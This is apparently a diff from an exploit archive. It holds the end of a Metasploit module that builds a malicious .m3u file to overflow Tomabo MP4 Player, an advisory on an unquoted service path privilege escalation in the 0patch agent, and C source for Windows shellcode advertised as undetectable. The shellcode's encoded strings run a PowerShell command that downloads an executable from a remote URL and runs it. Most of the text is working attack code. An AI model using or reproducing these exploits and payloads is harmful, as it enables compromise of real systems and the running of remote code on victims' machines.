'EXITFUNC' => 'seh',
'StackAdjustment' => -3500,
'DisableNops' => 'True',
},
'Payload' =>
{
'Space' => 1800,
'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x1a\x20"
},
'Platform' => 'win',
'Targets' =>
[
[ 'Tomabo MP4 Player <= 3.11.6', { 'Ret' => 0x00401CA9 } ],
],
'Privileged' => false,
'DisclosureDate' => 'Oct 18 2015',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
], self.class)
end
def exploit
sploit = rand_text_alpha_upper(1028)
sploit << "\xeb\x08\x90\x90" # short jump 8 bytes
sploit << [target.ret].pack('V') # universal
sploit << "\x90" * 16
sploit << payload.encoded
sploit << "\x44" * 436
playlist = sploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(playlist)
end
end

63
platforms/windows/local/39984.txt Executable file
View file

@ -0,0 +1,63 @@

ACROS Security 0patch (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation
Vendor: ACROS, d.o.o.
Product web page: https://www.0patch.com
Affected version: 2016.05.19.539
Summary: 0patch (pronounced 'zero patch') is a platform for instantly
distributing, applying and removing microscopic binary patches to/from
running processes without having to restart these processes (much less
reboot the entire computer).
Desc: The application suffers from an unquoted search path issue impacting
the service '0patchservice' for Windows deployed as part of 0patch solution.
This could potentially allow an authorized but non-privileged local user to
execute arbitrary code with elevated privileges on the system. A successful
attempt would require the local user to be able to insert their code in the
system root path undetected by the OS or other security applications where
it could potentially be executed during application startup or reboot. If
successful, the local users code would execute with the elevated privileges
of the application.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5331
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5331.php
Vendor: https://0patch.blogspot.com/2016/06/new-release-0patch-agent-20160614850.html
08.06.2016
--
C:\>sc qc 0patchservice
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: 0patchservice
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\0patch\Agent\0PatchServicex64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : 0patch Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>cacls "C:\Program Files (x86)\0patch\Agent\0PatchServicex64.exe"
C:\Program Files (x86)\0patch\Agent\0patchServicex64.exe NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\>

147
platforms/windows/shellcode/39979.c Executable file
View file

@ -0,0 +1,147 @@
/*
[+] Author : B3mB4m
[~] Contact : b3mb4m@protonmail.com
[~] Project : https://github.com/b3mb4m/shellsploit-framework
[~] Greetz : Bomberman,T-Rex,Pixi
-----------------------------------------------------------
Tested on :
Windows XP/SP3 x86
Windows 7 Ultimate x64
Windows 8.1 Pro Build 9600 x64
Windows 10 Home x64
* This source belongs to shellsploit project under MIT licence.
* If you convert it an executable file, its will be FUD(without any encrypt).
-PoC : https://nodistribute.com/result/qwxU3DmFCR2M0OrQt
0x0: 31c9 xor ecx, ecx
0x2: b957696e45 mov ecx, 0x456e6957
0x7: eb04 jmp 0xd
0x9: 31c9 xor ecx, ecx
0xb: eb00 jmp 0xd
0xd: 31c0 xor eax, eax
0xf: 31db xor ebx, ebx
0x11: 31d2 xor edx, edx
0x13: 31ff xor edi, edi
0x15: 31f6 xor esi, esi
0x17: 648b7b30 mov edi, dword ptr fs:[ebx + 0x30]
0x1b: 8b7f0c mov edi, dword ptr [edi + 0xc]
0x1e: 8b7f1c mov edi, dword ptr [edi + 0x1c]
0x21: 8b4708 mov eax, dword ptr [edi + 8]
0x24: 8b7720 mov esi, dword ptr [edi + 0x20]
0x27: 8b3f mov edi, dword ptr [edi]
0x29: 807e0c33 cmp byte ptr [esi + 0xc], 0x33
0x2d: 75f2 jne 0x21
0x2f: 89c7 mov edi, eax
0x31: 03783c add edi, dword ptr [eax + 0x3c]
0x34: 8b5778 mov edx, dword ptr [edi + 0x78]
0x37: 01c2 add edx, eax
0x39: 8b7a20 mov edi, dword ptr [edx + 0x20]
0x3c: 01c7 add edi, eax
0x3e: 89dd mov ebp, ebx
0x40: 81f957696e45 cmp ecx, 0x456e6957
0x46: 0f8530010000 jne 0x17c
0x4c: 8b34af mov esi, dword ptr [edi + ebp*4]
0x4f: 01c6 add esi, eax
0x51: 45 inc ebp
0x52: 390e cmp dword ptr [esi], ecx
0x54: 75f6 jne 0x4c
0x56: 8b7a24 mov edi, dword ptr [edx + 0x24]
0x59: 01c7 add edi, eax
0x5b: 668b2c6f mov bp, word ptr [edi + ebp*2]
0x5f: 8b7a1c mov edi, dword ptr [edx + 0x1c]
0x62: 01c7 add edi, eax
0x64: 8b7caffc mov edi, dword ptr [edi + ebp*4 - 4]
0x68: 01c7 add edi, eax
0x6a: 89d9 mov ecx, ebx
0x6c: b1ff mov cl, 0xff
0x6e: 53 push ebx
0x6f: e2fd loop 0x6e
0x71: 68293b7d22 push 0x227d3b29
0x76: 6865786527 push 0x27657865
0x7b: 687474792e push 0x2e797474
0x80: 6828277075 push 0x75702728
0x85: 6863757465 push 0x65747563
0x8a: 686c457865 push 0x6578456c
0x8f: 685368656c push 0x6c656853
0x94: 686f6e292e push 0x2e296e6f
0x99: 6863617469 push 0x69746163
0x9e: 6870706c69 push 0x696c7070
0xa3: 686c6c2e41 push 0x412e6c6c
0xa8: 6820536865 push 0x65685320
0xad: 682d636f6d push 0x6d6f632d
0xb2: 6865637420 push 0x20746365
0xb7: 682d4f626a push 0x6a624f2d
0xbc: 68284e6577 push 0x77654e28
0xc1: 682729203b push 0x3b202927
0xc6: 682e657865 push 0x6578652e
0xcb: 6875747479 push 0x79747475
0xd0: 682c202770 push 0x7027202c
0xd5: 6865786527 push 0x27657865
0xda: 687474792e push 0x2e797474
0xdf: 68362f7075 push 0x75702f36
0xe4: 68742f7838 push 0x38782f74
0xe9: 6861746573 push 0x73657461
0xee: 6874792f6c push 0x6c2f7974
0xf3: 682f707574 push 0x7475702f
0xf8: 687468616d push 0x6d616874
0xfd: 6873677461 push 0x61746773
0x102: 686c692f7e push 0x7e2f696c
0x107: 687274682e push 0x2e687472
0x10c: 68652e6561 push 0x61652e65
0x111: 682f2f7468 push 0x68742f2f
0x116: 687470733a push 0x3a737074
0x11b: 6828276874 push 0x74682728
0x120: 6846696c65 push 0x656c6946
0x125: 686c6f6164 push 0x64616f6c
0x12a: 68446f776e push 0x6e776f44
0x12f: 686e74292e push 0x2e29746e
0x134: 68436c6965 push 0x65696c43
0x139: 682e576562 push 0x6265572e
0x13e: 68204e6574 push 0x74654e20
0x143: 686a656374 push 0x7463656a
0x148: 68772d4f62 push 0x624f2d77
0x14d: 6820284e65 push 0x654e2820
0x152: 682226207b push 0x7b202622
0x157: 68616e6420 push 0x20646e61
0x15c: 68636f6d6d push 0x6d6d6f63
0x161: 686c6c202d push 0x2d206c6c
0x166: 6872736865 push 0x65687372
0x16b: 68706f7765 push 0x65776f70
0x170: 89e2 mov edx, esp
0x172: 41 inc ecx
0x173: 51 push ecx
0x174: 52 push edx
0x175: ffd7 call edi
0x177: e88dfeffff call 9
0x17c: 8b34af mov esi, dword ptr [edi + ebp*4]
0x17f: 01c6 add esi, eax
0x181: 45 inc ebp
0x182: 813e45786974 cmp dword ptr [esi], 0x74697845
0x188: 75f2 jne 0x17c
0x18a: 817e0450726f63 cmp dword ptr [esi + 4], 0x636f7250
0x191: 75e9 jne 0x17c
0x193: 8b7a24 mov edi, dword ptr [edx + 0x24]
0x196: 01c7 add edi, eax
0x198: 668b2c6f mov bp, word ptr [edi + ebp*2]
0x19c: 8b7a1c mov edi, dword ptr [edx + 0x1c]
0x19f: 01c7 add edi, eax
0x1a1: 8b7caffc mov edi, dword ptr [edi + ebp*4 - 4]
0x1a5: 01c7 add edi, eax
0x1a7: 31c9 xor ecx, ecx
0x1a9: 51 push ecx
0x1aa: ffd7 call edi
*/
#include<stdio.h>
char shellcode[]=\
"\x31\xc9\xb9\x57\x69\x6e\x45\xeb\x04\x31\xc9\xeb\x00\x31\xc0\x31\xdb\x31\xd2\x31\xff\x31\xf6\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x81\xf9\x57\x69\x6e\x45\x0f\x85\x30\x01\x00\x00\x8b\x34\xaf\x01\xc6\x45\x39\x0e\x75\xf6\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x29\x3b\x7d\x22\x68\x65\x78\x65\x27\x68\x74\x74\x79\x2e\x68\x28\x27\x70\x75\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x68\x6f\x6e\x29\x2e\x68\x63\x61\x74\x69\x68\x70\x70\x6c\x69\x68\x6c\x6c\x2e\x41\x68\x20\x53\x68\x65\x68\x2d\x63\x6f\x6d\x68\x65\x63\x74\x20\x68\x2d\x4f\x62\x6a\x68\x28\x4e\x65\x77\x68\x27\x29\x20\x3b\x68\x2e\x65\x78\x65\x68\x75\x74\x74\x79\x68\x2c\x20\x27\x70\x68\x65\x78\x65\x27\x68\x74\x74\x79\x2e\x68\x36\x2f\x70\x75\x68\x74\x2f\x78\x38\x68\x61\x74\x65\x73\x68\x74\x79\x2f\x6c\x68\x2f\x70\x75\x74\x68\x74\x68\x61\x6d\x68\x73\x67\x74\x61\x68\x6c\x69\x2f\x7e\x68\x72\x74\x68\x2e\x68\x65\x2e\x65\x61\x68\x2f\x2f\x74\x68\x68\x74\x70\x73\x3a\x68\x28\x27\x68\x74\x68\x46\x69\x6c\x65\x68\x6c\x6f\x61\x64\x68\x44\x6f\x77\x6e\x68\x6e\x74\x29\x2e\x68\x43\x6c\x69\x65\x68\x2e\x57\x65\x62\x68\x20\x4e\x65\x74\x68\x6a\x65\x63\x74\x68\x77\x2d\x4f\x62\x68\x20\x28\x4e\x65\x68\x22\x26\x20\x7b\x68\x61\x6e\x64\x20\x68\x63\x6f\x6d\x6d\x68\x6c\x6c\x20\x2d\x68\x72\x73\x68\x65\x68\x70\x6f\x77\x65\x89\xe2\x41\x51\x52\xff\xd7\xe8\x8d\xfe\xff\xff\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x45\x78\x69\x74\x75\xf2\x81\x7e\x04\x50\x72\x6f\x63\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x31\xc9\x51\xff\xd7";
main(){(* (int(*)()) shellcode)();}